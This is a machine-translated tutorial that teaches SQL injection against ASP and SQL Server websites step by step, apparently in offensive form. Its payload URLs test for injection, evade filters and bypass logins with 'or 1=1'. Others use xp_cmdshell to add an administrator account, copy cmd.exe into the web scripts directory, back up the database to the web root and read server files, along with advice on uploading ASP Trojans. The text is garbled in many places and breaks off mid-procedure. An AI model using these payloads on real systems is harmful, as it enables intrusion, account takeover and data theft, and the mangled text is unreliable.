What is injection attacks? (1)

With the development of B/S application development, more and more programmers are writing applications using this mode. However, due to the varying levels and experience of programmers, a considerable number of programmers did not judge the legitimacy of user input data when writing code, posing a security risk to the application. You can submit a piece of database query code, Root
Obtain the expected data according to the results returned by the program. This is the so-called SQL injection, that is, SQL injection.
SQL injection is accessed from the normal WWW port, and it seems to be no different from the general web page access, so the current Municipal firewall does not alert SQL injection, if the Administrator does not check IIS logs, it may be invisible for a long time. However, the SQL injection method is quite flexible, and many unexpected situations may occur during the injection process. Can you analyze the data according to the actual situation and construct clever SQL statements to obtain the desired data successfully.
According to statistics, ASP + access or sqlserver accounts for more than 70% of websites, PHP + mysq accounts for L20 %, and others do not. In this paper, SQL-SERVER + ASP examples to illustrate the principle, method and process of SQL injection. (The PHP injection article was written by another Nb-consortium friend Zwell)
The general idea of SQL injection attacks is:
L SQL Injection Location discovered;
L determine the background database type;
L determine the executable status of xp_cmdshell
L web virtual directory discovered
L upload ASP Trojans;
L obtain the Administrator permission;
I. Determination of SQL Injection Vulnerabilities
In general, SQL Injection generally exists in the form of http: // XXX. XXX. XXX/ABC. asp? In ASP dynamic web pages with parameters such as ID = XX, sometimes a dynamic web page may have only one parameter, sometimes there may be N parameters, sometimes Integer Parameters, or sometimes string parameters, cannot be generalized. In short, as long as a dynamic webpage with parameters and the webpage accesses the database, there may be SQL injection. If ASP programmers do not have security awareness and do not filter necessary characters, there is a high possibility of SQL injection.
To fully understand the dynamic web page response information, adjust the IE configuration first. Remove the check box before ie menu-tool-Internet option-advanced-show friendly HTTP Error messages.
To clarify the problem, the following uses http: // XXX. XXX. XXX/ABC. asp? P = YY is used as an example for analysis. yy may be an integer or a string.
1. Integer parameter judgment
When the input parameter YY is an integer, the SQL statement in ABC. asp is generally as follows:
Select * from table name where field = YY, so you can use the following steps to test whether SQL Injection exists.
① Http: // XXX. XXX. XXX/ABC. asp? P = YY ''; (add a single quotation mark). The SQL statement in ABC. asp becomes
Select * from table name where field = YY '', ABC. asp running exception;
② Http: // XXX. XXX. XXX/ABC. asp? P = YY and 1 = 1, ABC. asp is running normally, and it works properly with http: // XXX. XXX. XXX/ABC. asp? P = YY: The running result is the same;
③ Http: // XXX. XXX. XXX/ABC. asp? P = YY and 1 = 2, ABC. asp running exception;
If the preceding three steps are fully met, the SQL injection vulnerability exists in ABC. asp.
2. Determination of string Parameters
When the input parameter YY is a string, the SQL statement in ABC. asp is generally as follows:
Select * from table name where field = 'yy', so you can use the following steps to test whether SQL Injection exists.
① Http: // XXX. XXX. XXX/ABC. asp? P = YY ''; (add a single quotation mark). The SQL statement in ABC. asp becomes
Select * from table name where field = YY '', ABC. asp running exception;
② Http: // XXX. XXX. XXX/ABC. asp? P = YY & nb... 39; 1 ''= ''1'', ABC. ASP runs normally, and it works with http: // XXX. xxx. xxx/ABC. asp? P = YY: The running result is the same;
③ Http: // XXX. XXX. XXX/ABC. asp? P = YY & nb... 39; 1 ''= ''2', ABC. asp running exception;
If the preceding three steps are fully met, the SQL injection vulnerability exists in ABC. asp.
3. Handling of Special Cases
Sometimes ASP programmers filter out single quotes and other characters to prevent SQL injection. You can try the following methods.
① Fixed-size mixing: Because vbs are not case sensitive, programmers usually either filter all uppercase strings or all lowercase strings during filtering, while case-sensitive mixing is often ignored. For example, replace select and select with select;
② Unicode method: in IIS, Unicode character sets are used for internationalization. We can convert the string entered in IE into a unicode string for input. For example, + = % 2B, Space = % 20, etc. For urlencode information, see Appendix 1;
③ ASCII code method: You can replace all or part of the entered characters with ASCII code, such as U = CHR (85) and a = CHR (97, for ASCII information, see appendix 2;
Ii. differentiate Database Server types
In general, access and SQL-SERVER are the most commonly used database server, although they all support T-SQL standards, but there are differences, and different databases have different attack methods, must be treated differently.
1. Identify by using system variables of the Database Server
SQL-SERVER has user, db_name () and other system variables, using these system values not only can judge the SQL-SERVER, but also can get a lot of useful information. For example:
① Http: // XXX. XXX. XXX/ABC. asp? P = YY and user> 0 not only can judge whether it is a SQL-SERVER, but also can get the user name currently connected to the database
② 0 = ""> http: // XXX. XXX. XXX/ABC. asp? P = YY & n... db_name ()> 0 can not only judge whether it is a SQL-SERVER, but also get the name of the database currently in use;
2. Use System tables
The access system table is msysobjects, and has no access permission in the web environment, while the SQL-SERVER system table is sysobjects, has access permission in the Web environment. For the following two statements:
① 0 = "" From = "" count (*) = "" (select = ""> http: // XXX. XXX. XXX/ABC. asp? P = YY and (select count (*) from sysobjects)> 0
② 0 = ""> http: // XXX. XXX. XXX/ABC. asp? P = YY and (select count (*) from msysobjects)> 0
If the database is a SQL-SERVE, the first, ABC. asp must be running normally, the second is abnormal; if access is, both are abnormal.
3. MSSQL three key system tables
Sysdatabases system table: each database on Microsoft SQL Server occupies one row in the table. When you first Install SQL Server, sysdatabases contains the master, model, MSDB, mssqlweb, and tempdb database items. The table is only stored in the master database. This table is saved in the master database. What information is saved in this table? This is very important. It stores all the database names, as well as the database IDs and related information.
Here I will list the useful field names and descriptions. Name // indicates the name of the database.
Dbid // indicates the database ID. dbid ranges from 1 to 5. These databases are master, model, MSDB, mssqlweb, and tempdb respectively. Select * from Master. DBO. sysdatabases to query all database names.
Sysobjects: each database in the SQL-SERVER has this system table, which stores all the objects created in the database, such as constraints, default values, logs, rules, stored procedures, etc, each object occupies one row in the table. The following table describes the field names and descriptions of the system table.
Name, ID, xtype, uid, status: Object Name, Object ID, object type, user ID of the owner object, and object status.
Object Type (xtype ). It can be one of the following object types:
C = check Constraints
D = default value or default Constraint
F = foreign key constraint
L = Log
Fn = scalar function
If = embedded table functions
P = Stored Procedure
PK = primary key constraint (type: K)
Rf = copy and filter the Stored Procedure
S = system table
TF = table functions
Tr = trigger
U = User table
Uq = unique constraint (type is K)
V = View
X = Extended Stored Procedure
When xtype = ''u'' and status> 0 indicates that the table is created by the user, the object name is the table name, and the Object ID is the table id value.
Use: Select * From chouyfd. DBO. sysobjects where xtype = 'u'' and status> 0 to list the table names created by all users in chouyfd.
Syscolumns: each column in each table and view occupies one row in the table, and each parameter in the stored procedure occupies one row in the table. The table is located in each database. The main fields are:
Name, ID, colid: The field name, table ID, and field ID respectively. The ID is the ID of the table we just obtained using sysobjects.
Select * From chouyfd. DBO. syscolumns where id = 123456789.
Iii. Determine the executable status of xp_cmdshell
If the account that is currently connected to data has the SA permission and master. DBO. xp_mongoshell extends the Stored Procedure (you can directly use the shell of the operating system to call this Stored Procedure). The entire computer can be fully controlled using the following methods, and all subsequent steps can be saved.
1. 0 = ""> http: // XXX. XXX. XXX/ABC. asp? P = YY & nb... er> 0 ABC. asp: Execution exception. However, you can obtain the username of the currently connected database (if DBO is displayed, it indicates SA ).
2. 0 = ""> http: // XXX. XXX. XXX/ABC. asp? P = yy... Me ()> 0 ABC. asp execution exception, but the name of the database currently connected can be obtained.
3. http: // XXX. XXX. XXX/ABC. asp? P = YY; Exec master .. xp_mongoshell "Net user aaa bbb/Add" -- (the master is the primary database of the SQL-SERVER; the semicolon in the name indicates that the SQL-SERVER executes the statement name before the semicolon and continues to execute the statement after it; "-" is an annotation, indicating that all the content after it is only a annotation, and the system does not execute it) You can directly add the operating system account AAA with the password BBB.
4. http: // XXX. XXX. XXX/ABC. asp? P = YY; Exec master .. xp_mongoshell "net localgroup administrators AAA/Add" -- add the newly added account AAA to the Administrators group.
5. http: // XXX. XXX. XXX/ABC. asp? P = YY; backuup database name to disk = ''c: \ Inetpub \ wwwroot \ save. DB ''backs up all the data to the web directory and downloads the file over HTTP (of course, you must first know the WEB virtual directory ).
6. Create a unicode vulnerability by copying cmd
Http: // XXX. XXX. XXX/ABC. asp? P = YY; exe... DBO. xp_mongoshell "Copy c: \ winnt \ system32 \ cmd.exe c: \ Inetpub \ scripts \ cmd.exe" creates a unicode vulnerability by exploiting this vulnerability, this completes the control of the entire computer (of course, the first choice is to know the WEB virtual directory ).
4. Discover web virtual directories
Only the WEB virtual directory can be found to determine the location where the ASP Trojan is placed and obtain the user permission. Two methods are effective.
First, based on experience, the Web virtual directory is: C: \ Inetpub \ wwwroot; D: \ Inetpub \ wwwroot; E: \ Inetpub \ wwwroot, the executable virtual directory is: C: \ Inetpub \ scripts; D: \ Inetpub \ scripts; E: \ Inetpub \ scripts.
The second is to traverse the directory structure of the system, analyze the results and find the WEB virtual directory;
First create a temporary table: temp
Http: // XXX. XXX. XXX/ABC. asp? P = YY; Create & n... MP (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
Next:
(1) We can use xp_availablemedia to obtain all the current drives and store them in the temp table:
Http: // XXX. XXX. XXX/ABC. asp? P = YY; insert temp... ter. DBO. xp_availablemedia ;--
We can query the temp content to obtain the drive list and related information.
(2) We can use xp_subdirs to obtain the subdirectory list and store it in the temp table:
Http: // XXX. XXX. XXX/ABC. asp? P = YY; insert into temp (I... DBO. xp_subdirs ''c :\'';--
(3) We can also use xp_dirtree to obtain the directory tree structure of all subdirectories and import them to the temp table:
Http: // XXX. XXX. XXX/ABC. asp? P = YY; insert into temp (ID, num1) exec master. DBO. xp_dirtree ''c :\'';--
In this way, you can successfully browse the list of all directories (folders:
To view the content of a file, run xp_cmdsell:
Http: // XXX. XXX. XXX/ABC. asp? P = YY; insert into temp (ID) exec... nbsp; ''type c: \ WEB \ index. asp '';--
You can use the ''bulk insert' syntax to insert a text file into a temporary table. For example, bulk insert temp (ID) from ''c: \ Inetpub \ wwwroot \ index. asp''
View temp to view the index. asp file! By analyzing various ASP files, you can obtain a large amount of system information, web construction and management information, and even the connection password of the SA account.
Of course, if xp_cmshell can be executed, we can use it to complete:
Http: // XXX. XXX. XXX/ABC. asp? P = YY; insert into temp (ID) & nbs... into shell ''dir c :\'';--
Http: // XXX. XXX. XXX/ABC. asp? P = YY; insert into temp (ID) & n... p_{shell ''dir c: \ *. asp/S/'';--
Through xp_cmdshell, we can see all what we want to see, including w3svc
Http: // XXX. XXX. XXX/ABC. asp? P = YY; insert into temp (ID) exec master. DBO. xp_1_she... UB \ adminscripts \ adsutil. vbs Enum W3SVC''
However, we can also use
Http: // XXX. XXX. XXX/ABC. asp? P = YY; insert into temp (ID, num1) exec master. DBO. xp_dirtree ''c :\'';--
Note:
1. After each of the preceding items is viewed, all contents in temp should be deleted:
Http: // XXX. XXX. XXX/ABC. asp? P = YY; delete from temp ;--
2. The temp table is browsed by: (Suppose testdb is the name of the database currently connected)
Http: // XXX. XXX. XXX/ABC. asp? P = YY and (select top &... nbsp; testdb. DBO. temp)> 0 to get the value of the first record ID field in the table temp, and compare it with the integer, obviously ABC. ASP is abnormal, but the value of the ID field can be found in the exception. If the table name is xyz
Http: // XXX. XXX. XXX/ABC. asp? P = YY and (select top 1 ID from... ere id not in (''xyz '')> 0 to get the value of the second record ID field in the temp table.
5. upload an ASP Trojan
The so-called ASP Trojan is a piece of ASP code with special functions and put it under the scripts of the Web virtual directory. Remote customers can execute it through IE to obtain the user permission of the system, implement initial control over the system. There are two effective methods for uploading ASP Trojans:
1. Use the Web Remote Management Function
Many Web sites provide remote management to facilitate maintenance. Many Web sites have different access permissions for different users. In order to achieve the control of user permissions, there is a Web page that requires the user name and password. Only after the correct value is entered can the next operation be performed to manage the web, such as uploading and downloading files, browsing directories, and modifying configurations.
Therefore, if you get the correct user name and password, you can not only upload ASP Trojans, but sometimes even directly get the user permission to browse the system, all the complex operations of "discovering Web virtual directories" in the previous step are omitted.
The username and password are generally stored in a table, and the problem is solved when the table is read. The following two effective methods are provided.
A. injection method:
Theoretically, the authentication webpage has the following types:
Select * from Admin where username = 'xxx' and Password = ''yyy''. If no necessary character filtering is performed before the sentence is officially run, it is easy to implement SQL injection.
For example, enter ABC ''or 1 = 1 in the username text box -- enter 123 in the password box, and the SQL statement is changed:
Select * from Admin where username = ''abc'' or 1 = 1 and Password = ''000000'' this statement can always be correctly executed regardless of the user name and password entered by the user, users can easily cheat the system and obtain valid identities.
B. Guess the solution:
The basic idea is: to guess the names of all databases, guess the names of each table in the warehouse, analyze the table names that store the user name and password, and guess the names of each field in the table, guess the content of each record in the table.
L guess all database names
Http: // XXX. XXX. XXX/ABC. asp? P = YY and (select count (*) from Master. DBO. sysdatabases where Name> 1 and dbid = 6) 0 because the value of dbid ranges from 1 to 5, it is used by the system. Therefore, the user must have created it from 6. In addition, we submitted name> 1 (the name field is a character-type field and the number will be wrong), ABC. ASP is abnormal, and the first database name can be obtained. Similarly, the dbid is changed to 7, 8, 9, 10, 11, 12... all Database names can be obtained.
Assume that the database name is testdb.